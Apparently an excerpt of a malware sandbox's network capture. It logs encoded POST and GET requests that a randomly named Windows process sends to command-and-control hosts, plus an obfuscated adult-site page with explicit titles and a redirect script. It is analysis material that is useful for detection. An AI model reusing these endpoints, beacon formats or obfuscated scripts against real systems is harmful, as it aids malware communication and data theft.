                                                                                                                                              Oct 4, 2024 08:10:19.817035913 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:19 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 19015
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 16:20:03 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66fec433-4a47"
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 75 66 65 66 66 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 33 43 68 74 6d 6c 25 32 30 6c 61 6e 67 25 33 44 25 32 32 7a 68 2d 43 4e 25 32 32 25 33 45 25 33 43 68 65 61 64 25 33 45 25 33 43 74 69 74 6c 65 25 33 45 25 75 35 39 32 37 25 75 38 63 36 31 25 75 38 39 63 36 25 75 39 38 39 31 5f 64 78 32 32 2e 78 79 7a 25 75 35 36 64 65 25 75 35 62 62 36 25 75 35 62 66 63 25 75 38 32 32 61 25 33 43 2f 74 69 74 6c 65 25 33 45 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 6b 65 79 77 6f 72 64 73 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 25 75 37 37 65 64 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 36 34 31 65 25 75 37 62 31 31 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 25 75 38 39 63 36 25 75 39 38 39 31 25 75 35 32 30 36 25 75 34 65 61 62 25 32 43 25 75 35 31 34 64 25 75 38 64 33 39 25 75 38 39 63 36 25 75 39 38 39 31 25 32 43 [TRUNCATED]
                                                                                                                                              Data Ascii: <script>...document.write(unescape("%ufeff%3C%21DOCTYPE%20html%3E%3Chtml%20lang%3D%22zh-CN%22%3E%3Chead%3E%3Ctitle%3E%u5927%u8c61%u89c6%u9891_dx22.xyz%u56de%u5bb6%u5bfc%u822a%3C/title%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22%u77ed%u89c6%u9891%2C%u641e%u7b11%u89c6%u9891%2C%u89c6%u9891%u5206%u4eab%2C%u514d%u8d39%u89c6%u9891%2C%u5728%u7ebf%u89c6%u9891%2C%u9884%u544a%u7247%22%3E%3Cmeta%20name%3D%22description%22%20content%3D%22%u63d0%u4f9b%u6700%u65b0%u6700%u5feb%u7684%u89c6%u9891%u5206%u4eab%u6570%u636e%22%3E%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3B%20charset%3DUTF-8%22%20/%3E%3Cmeta%20name%3D%22renderer%22%20content%3D%22webkit%7Cie-comp%7Cie-stand%22%20/%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3Dedge%22%20/%3E%3Cmeta%20name%3D%22format-detection%22%20content%3D%22telephone%3Dno%22%20/%3E%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3D480%2C%20user-scalable%3Dno%2C%20viewport-fit%3Dcover%22%20/%3E%3Cmeta%20http-equiv%3D%22Cache- [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:10:19.817152977 CEST1289INData Raw: 32 6e 6f 2d 63 61 63 68 65 25 32 43 25 32 30 6e 6f 2d 73 74 6f 72 65 25 32 43 25 32 30 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 25 32 32 25 32 30 2f 25 33 45 25 33 43 73 63 72 69 70 74 25 32 30 73 72 63 25 33 44 25 32 32 2f 54 70 6c 2f 63 6c
                                                                                                                                              Data Ascii: 2no-cache%2C%20no-store%2C%20must-revalidate%22%20/%3E%3Cscript%20src%3D%22/Tpl/cl/facai/js/cnzz.js%22%20type%3D%22text/javascript%22%3E%3C/script%3E%3Clink%20href%3D%22/Tpl/cl/facai/css/global.css%22%20rel%3D%22stylesheet%22%20/%3E%3Clink%20h
                                                                                                                                              Oct 4, 2024 08:10:19.817277908 CEST1289INData Raw: 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6c 65 61 72 25 32 32 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33
                                                                                                                                              Data Ascii: iv%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22head_h%22%3E%3C/div%3E%3Cscript%20type%3D%22text/javascript%22%3Edocument.writeln%28window.top_banner%29%3B%3C/script%3E%3Cdiv%20class%3D%22container%20rm_bq
                                                                                                                                              Oct 4, 2024 08:10:19.817537069 CEST1289INData Raw: 44 25 32 32 68 74 74 70 73 25 33 41 2f 2f 6d 64 31 34 35 76 31 2e 63 6f 6d 2f 32 79 77 68 6f 73 33 78 2f 69 6e 64 65 78 2e 6a 70 67 2e 6a 73 25 32 32 25 32 30 73 72 63 25 33 44 25 32 32 2f 69 6d 61 67 65 73 2f 62 6c 61 6e 6b 2e 70 6e 67 25 32 32
                                                                                                                                              Data Ascii: D%22https%3A//md145v1.com/2ywhos3x/index.jpg.js%22%20src%3D%22/images/blank.png%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34552.html%22%20target%3D%22_blank%22%3E%u53f0%u6e7eSWAG%u5e74%u5ea6%u6700%u5
                                                                                                                                              Oct 4, 2024 08:10:19.817724943 CEST1289INData Raw: 25 33 45 25 33 43 2f 68 33 25 33 45 25 33 43 73 70 61 6e 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 5f 6a 25 32 32 25 33 45 25 33 43 2f 73 70 61 6e 25 33 45 25 33 43 73 70 61 6e 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 7a 5f 73 25 32 32 25 33
                                                                                                                                              Data Ascii: %3E%3C/h3%3E%3Cspan%20class%3D%22s_j%22%3E%3C/span%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22col-lg-4%20col-md-4%20col-xs-6%22%3E%3Cdiv%20class%3D%22n_
                                                                                                                                              Oct 4, 2024 08:10:19.817769051 CEST1289INData Raw: 75 36 62 32 37 25 75 37 66 38 65 25 75 38 33 30 33 25 75 35 31 33 66 25 75 34 65 30 30 25 75 37 65 62 66 25 75 35 39 32 39 25 75 39 39 39 32 25 75 35 39 33 34 25 75 39 63 38 64 25 75 35 64 65 38 25 75 35 63 33 62 25 75 39 37 65 39 25 75 38 38 64
                                                                                                                                              Data Ascii: u6b27%u7f8e%u8303%u513f%u4e00%u7ebf%u5929%u9992%u5934%u9c8d%u5de8%u5c3b%u97e9%u88d4%u6b32%u5973%u300ckimmy%u300dOF%u5927%u5c3a%u5ea6%u9732%u8138%u79c1%u62cd4%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22
                                                                                                                                              Oct 4, 2024 08:10:19.818005085 CEST1289INData Raw: 68 72 65 66 25 33 44 25 32 32 2f 70 2f 31 2f 33 34 35 32 39 2e 68 74 6d 6c 25 32 32 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 75 37 63 64 36 25 75 35 66 63 33 56 6c 6f 67 7e 25 75 36 37 38 31 25 75 35 34
                                                                                                                                              Data Ascii: href%3D%22/p/1/34529.html%22%20target%3D%22_blank%22%3E%u7cd6%u5fc3Vlog~%u6781%u54c1%u5fa1%u59d0%u591a%u59ff%u52bf%u6027%u7231%u53e3%u7206%u541e%u7cbe~%u840c%u5d3d%u5d3d%3C/a%3E%3C/h3%3E%3Cspan%20class%3D%22z_s%22%3E%3C/span%3E%3Cdiv%20class%3
                                                                                                                                              Oct 4, 2024 08:10:19.818151951 CEST1289INData Raw: 67 25 32 32 25 32 30 2f 25 33 45 25 33 43 2f 61 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 77 5f 7a 25 32 32 25 33 45 25 33 43 68 33 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32
                                                                                                                                              Data Ascii: g%22%20/%3E%3C/a%3E%3C/div%3E%3Cdiv%20class%3D%22w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/1/34527.html%22%20target%3D%22_blank%22%3E%u795e%u4ed9%u989c%u503c~%u70b8%u8857%u5c24%u7269~%u3010%u8c46%u8c46%u5b66%u59b9%u5416%u3011%u9a9a%u821e~%u6252%u7a
                                                                                                                                              Oct 4, 2024 08:10:19.818484068 CEST1289INData Raw: 5f 62 6c 61 6e 6b 25 32 32 25 33 45 4b 41 4d 31 39 34 25 75 35 65 38 36 25 75 37 39 35 64 25 75 34 65 30 38 25 75 35 39 32 62 25 75 38 30 30 31 25 75 36 37 37 66 25 75 35 33 34 37 25 75 38 30 34 63 25 75 66 66 30 63 4e 54 52 25 75 35 64 66 32 25
                                                                                                                                              Data Ascii: _blank%22%3EKAM194%u5e86%u795d%u4e08%u592b%u8001%u677f%u5347%u804c%uff0cNTR%u5df2%u5a5a%u5987%u5973%u5728%u5bb6%u5ead%u805a%u4f1a%u4e0a%u88ab%u64cd%uff0c%u5927%u80f8%u59bb%u5b50%u559d%u9189%u4e86%uff0c%u53d8%u5f97%u51cc%u4e71%uff0c%u5e76%u4e14
                                                                                                                                              Oct 4, 2024 08:10:19.818547010 CEST1289INData Raw: 5f 73 25 32 32 25 33 45 25 33 43 2f 73 70 61 6e 25 33 45 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 63 6c 65 61 72 25 32 32 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33 43 2f 64 69 76 25 33 45 25 33
                                                                                                                                              Data Ascii: _s%22%3E%3C/span%3E%3Cdiv%20class%3D%22clear%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22col-lg-4%20col-md-4%20col-xs-6%22%3E%3Cdiv%20class%3D%22n_r%22%3E%3Cdiv%20class%3D%22t_p%22%3E%3Ca%20href%3D%22/p/3/34559.html%22%20t
                                                                                                                                              Oct 4, 2024 08:10:19.970948935 CEST1289INData Raw: 32 77 5f 7a 25 32 32 25 33 45 25 33 43 68 33 25 33 45 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 2f 70 2f 33 2f 33 34 35 35 38 2e 68 74 6d 6c 25 32 32 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 33 45 25 75
                                                                                                                                              Data Ascii: 2w_z%22%3E%3Ch3%3E%3Ca%20href%3D%22/p/3/34558.html%22%20target%3D%22_blank%22%3E%u7a7a%u91cekiraAVDEBUT%u5de5%u4e1a%u5973%u5b50%u61a7%u61ac%u7684%u5076%u50cf%u8eab%u59ff%u73b0%u5728%u4ece%u5de5%u4f5c%u670d%u5230%u95ea%u95ea%u53d1%u5149%u7684%u


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              54192.168.11.20497843.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:25.202219963 CEST807OUTPOST /dlt0/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tukaari.shop
                                                                                                                                              Origin: http://www.tukaari.shop
                                                                                                                                              Referer: http://www.tukaari.shop/dlt0/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 4d 58 57 5a 54 75 33 71 46 74 64 65 4e 46 52 6d 59 65 35 6b 44 4d 61 65 50 6a 4b 68 76 4d 7a 38 56 68 71 52 39 6b 70 5a 34 72 48 6e 70 51 77 52 2b 76 43 62 46 4d 57 58 48 7a 54 48 46 65 52 57 71 4e 54 78 41 52 57 74 6d 30 6a 62 62 52 48 71 2b 71 4d 35 71 64 6d 77 61 43 7a 50 5a 54 69 74 74 43 67 49 58 50 74 79 53 50 4c 67 33 4f 31 37 76 47 56 61 2f 58 33 41 5a 74 7a 75 78 32 4f 59 42 58 39 36 44 63 34 4a 77 32 57 2f 37 49 6d 44 62 34 45 71 4d 4d 78 39 67 44 43 4e 70 32 64 79 38 4d 58 2f 56 5a 61 71 73 48 77 54 4d 54 73 6d 6b 52 48 30 48 51 3d 3d
                                                                                                                                              Data Ascii: oz=wkNNxgFGYdpeMXWZTu3qFtdeNFRmYe5kDMaePjKhvMz8VhqR9kpZ4rHnpQwR+vCbFMWXHzTHFeRWqNTxARWtm0jbbRHq+qM5qdmwaCzPZTittCgIXPtySPLg3O17vGVa/X3AZtzux2OYBX96Dc4Jw2W/7ImDb4EqMMx9gDCNp2dy8MX/VZaqsHwTMTsmkRH0HQ==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              55192.168.11.20497853.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:27.828198910 CEST827OUTPOST /dlt0/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tukaari.shop
                                                                                                                                              Origin: http://www.tukaari.shop
                                                                                                                                              Referer: http://www.tukaari.shop/dlt0/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 65 6e 6d 5a 66 70 44 71 44 4e 64 66 49 46 52 6d 57 2b 35 67 44 4d 57 65 50 67 47 78 76 2b 58 38 53 45 57 52 38 67 31 5a 35 72 48 6e 77 67 77 55 68 2f 43 75 46 4d 61 68 48 7a 66 48 46 65 31 57 71 4d 50 78 41 6d 4b 75 30 55 6a 46 4f 42 48 6f 68 36 4d 35 71 64 6d 77 61 43 32 61 5a 54 36 74 73 7a 51 49 57 75 74 31 59 76 4c 76 2b 75 31 37 72 47 56 65 2f 58 33 69 5a 73 65 35 78 31 6d 59 42 54 35 36 4e 70 4d 4b 6c 6d 58 32 2f 49 6e 42 55 59 64 63 49 2f 31 4a 78 42 57 57 73 46 55 4f 35 61 47 6c 49 72 75 4f 76 55 73 68 49 6a 56 4f 6d 54 47 76 61 53 6b 7a 61 37 67 7a 63 52 68 38 6f 45 43 59 38 54 66 49 59 75 34 3d
                                                                                                                                              Data Ascii: oz=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+X8SEWR8g1Z5rHnwgwUh/CuFMahHzfHFe1WqMPxAmKu0UjFOBHoh6M5qdmwaC2aZT6tszQIWut1YvLv+u17rGVe/X3iZse5x1mYBT56NpMKlmX2/InBUYdcI/1JxBWWsFUO5aGlIruOvUshIjVOmTGvaSkza7gzcRh8oECY8TfIYu4=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              56192.168.11.20497863.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:30.474956989 CEST1289OUTPOST /dlt0/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tukaari.shop
                                                                                                                                              Origin: http://www.tukaari.shop
                                                                                                                                              Referer: http://www.tukaari.shop/dlt0/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 65 6e 6d 5a 66 70 44 71 44 4e 64 66 49 46 52 6d 57 2b 35 67 44 4d 57 65 50 67 47 78 76 2b 66 38 56 32 4f 52 39 42 31 5a 72 37 48 6e 34 41 77 56 68 2f 43 7a 46 4d 43 39 48 7a 43 38 46 59 78 57 6c 4f 72 78 45 6e 4b 75 74 6b 6a 46 57 78 48 31 2b 71 4d 57 71 5a 4c 37 61 43 6d 61 5a 54 36 74 73 77 49 49 52 2f 74 31 65 76 4c 67 33 4f 31 42 76 47 56 36 2f 57 66 59 5a 73 72 45 77 46 47 59 41 33 64 36 50 62 55 4b 34 57 58 34 79 6f 6e 6a 55 59 68 50 49 2b 5a 76 78 41 79 73 73 47 6b 4f 35 65 2f 76 64 36 61 72 74 46 77 53 49 42 4a 32 6f 53 65 38 64 68 64 50 55 4c 34 4e 43 6e 42 79 68 56 47 78 70 54 50 50 43 70 41 74 57 35 31 6a 6b 6f 42 6b 52 35 69 50 45 74 38 74 70 74 66 32 48 4f 79 62 31 47 5a 6a 69 55 6f 4d 51 47 54 4c 41 72 76 77 4a 4b 56 36 6b 66 62 4a 6b 70 72 63 49 30 53 35 4a 79 54 38 63 56 37 57 36 45 49 30 2f 59 42 61 54 69 6f 68 78 52 54 48 56 4d 4f 6e 58 46 48 37 4c 7a 57 37 51 59 6e 42 48 71 44 7a 2f 39 32 59 2f 6b 65 65 79 57 74 58 53 66 53 2b 4a 55 50 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+f8V2OR9B1Zr7Hn4AwVh/CzFMC9HzC8FYxWlOrxEnKutkjFWxH1+qMWqZL7aCmaZT6tswIIR/t1evLg3O1BvGV6/WfYZsrEwFGYA3d6PbUK4WX4yonjUYhPI+ZvxAyssGkO5e/vd6artFwSIBJ2oSe8dhdPUL4NCnByhVGxpTPPCpAtW51jkoBkR5iPEt8tptf2HOyb1GZjiUoMQGTLArvwJKV6kfbJkprcI0S5JyT8cV7W6EI0/YBaTiohxRTHVMOnXFH7LzW7QYnBHqDz/92Y/keeyWtXSfS+JUP8JMjVIswAmypxde+o4KaXksjqebVeq3zP8aGRTD/O407f9QQ85Q/xvPaRwZJuJoh3dO0weiW+6vEMQ/NKf51bODb3vR/nKrPkLc1fwMFWvp+LCXCgnKc1UW+436n0PcWA727vq5GK7EXBQsEaVnBU7fLz95XJipw6QM+wV7XkLnkSBiCsJJ+J7g4BRCZvay48RICYTuNBjp42L3klXS2Q0WFoJVIDJX/LCzhE6XQT3UaQ8YKGAz5cD/t5kAEGadUoVb0F8JpfTyncf5nQlqpPFMy0FfXZaFsm16loHdVSQC0a77+ULANyqCvVhyU185zgrWyntifNV/cXFVTWgmyS2
                                                                                                                                              Oct 4, 2024 08:10:30.475012064 CEST5156OUTData Raw: 48 33 55 46 45 78 4b 68 79 77 6c 30 4d 53 6b 39 4c 36 65 67 36 6b 50 6a 74 71 51 37 4e 4d 52 51 53 64 63 50 59 57 47 51 30 30 72 50 74 46 57 44 47 34 79 6b 69 49 6b 4f 56 48 61 4d 30 73 32 2f 7a 56 77 52 39 59 31 32 2f 31 42 38 77 66 64 38 46 41
                                                                                                                                              Data Ascii: H3UFExKhywl0MSk9L6eg6kPjtqQ7NMRQSdcPYWGQ00rPtFWDG4ykiIkOVHaM0s2/zVwR9Y12/1B8wfd8FA2W+zqjbIKj89XLryQ6wjBdCVKSY585H4aPU+QsXeb35oP2vg6YtRbZIxBm8rHgSQWQU0HhYqg4RJthpEPnMPa4wKxyFQbdo1fooIXAolPjkLkG5owiazHWOlHBw4mHpqNqZOgOlWyTlg/hw8g8vUVH6hGWDnveGYC
                                                                                                                                              Oct 4, 2024 08:10:30.475054026 CEST1289OUTData Raw: 69 6f 7a 30 7a 7a 68 31 4d 67 43 72 45 55 5a 49 75 4e 32 71 47 4f 65 76 59 37 77 51 64 63 38 41 48 31 69 50 4c 59 7a 77 73 47 6e 38 72 45 63 79 37 4b 78 4e 64 78 6b 34 49 7a 49 37 73 39 45 68 66 33 74 64 39 57 39 58 66 52 70 77 41 76 53 5a 64 61
                                                                                                                                              Data Ascii: ioz0zzh1MgCrEUZIuN2qGOevY7wQdc8AH1iPLYzwsGn8rEcy7KxNdxk4IzI7s9Ehf3td9W9XfRpwAvSZdaG827NY/RGzSY9hZo7kSekwFVc+2fNRehv3Qa4w6lBWIk1rIw6lQfx3F8RBmOXHyToYkzkWDtE2EddYnbPzxCJtrzQJtpbXOmAQXFnPOCzEAKEQ2XGKFdeBWlrdc5ST4ijZul3QmQz6939kI9E6vR0m01vi3/jP+qG
                                                                                                                                              Oct 4, 2024 08:10:30.475224018 CEST242OUTData Raw: 4b 51 72 2f 4f 51 38 4c 30 39 38 61 49 33 39 4a 4c 75 65 46 67 57 78 51 7a 57 55 31 43 65 2f 37 46 6c 68 4e 50 66 51 37 50 69 32 75 74 70 73 75 4c 67 39 32 58 71 45 35 39 33 31 54 6a 62 7a 34 4c 72 4d 4b 63 75 65 4b 67 72 2b 72 44 6b 39 66 6c 51
                                                                                                                                              Data Ascii: KQr/OQ8L098aI39JLueFgWxQzWU1Ce/7FlhNPfQ7Pi2utpsuLg92XqE5931Tjbz4LrMKcueKgr+rDk9flQZ254p2Qc2QW03+Vm/xD+QHutrMC1fzhEXhBft/k2GXSmP/+RE1s8OvVyb4ETvY2FSOpux/xrHJlhEAyb9/VuXcy/SG5neMzdkx63Ids5K2ROdneXVg9Oqpr8sbZgodjNfj48Acnof4vMifbd9s7cuoSRt663sA==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              57192.168.11.20497873.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:10:33.107224941 CEST547OUTGET /dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tukaari.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:10:34.124681950 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:10:34 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 39 6d 6c 74 79 55 70 71 54 70 4e 46 47 67 69 4c 4c 4d 2f 51 49 74 30 4a 41 31 45 79 61 4c 56 77 62 4e 4f 36 4c 56 4b 38 78 4d 4b 41 61 68 71 4f 30 6b 78 38 35 4e 72 72 72 7a 74 49 34 2b 57 64 4a 2b 57 6d 46 53 58 65 43 4e 4d 33 39 50 48 64 49 47 6a 44 31 6e 44 38 63 6b 4f 63 67 61 63 51 74 73 69 6d 55 6a 6e 4a 65 79 44 67 6c 53 59 65 58 35 39 63 64 50 34 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              58192.168.11.204978813.248.169.48804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:08.400270939 CEST810OUTPOST /tcs6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.invicta.world
                                                                                                                                              Origin: http://www.invicta.world
                                                                                                                                              Referer: http://www.invicta.world/tcs6/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 59 72 68 6a 6d 34 2b 75 44 55 64 34 57 77 75 36 45 71 67 57 4e 75 57 65 6e 52 70 6b 43 2b 47 43 4e 4d 79 6b 6b 68 49 4c 48 44 4e 36 30 39 54 6c 41 65 51 50 68 36 5a 69 59 67 53 4e 4a 30 6c 48 62 6c 5a 36 35 4a 74 65 35 48 53 71 42 41 55 31 39 62 30 6b 6e 58 6e 7a 72 2b 6f 78 73 6c 63 31 67 4e 6c 6b 35 79 74 33 47 72 6c 2b 72 4d 77 44 6c 33 4a 2b 70 4f 2b 6f 7a 37 33 67 74 78 41 2b 62 4c 2f 37 45 42 37 67 65 7a 30 6c 6d 38 4f 50 6e 35 2b 30 65 4c 72 77 61 76 62 36 38 62 38 50 6c 6d 56 51 52 4e 49 49 63 79 61 62 2b 69 4f 53 38 32 6a 52 73 67 3d 3d
                                                                                                                                              Data Ascii: oz=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
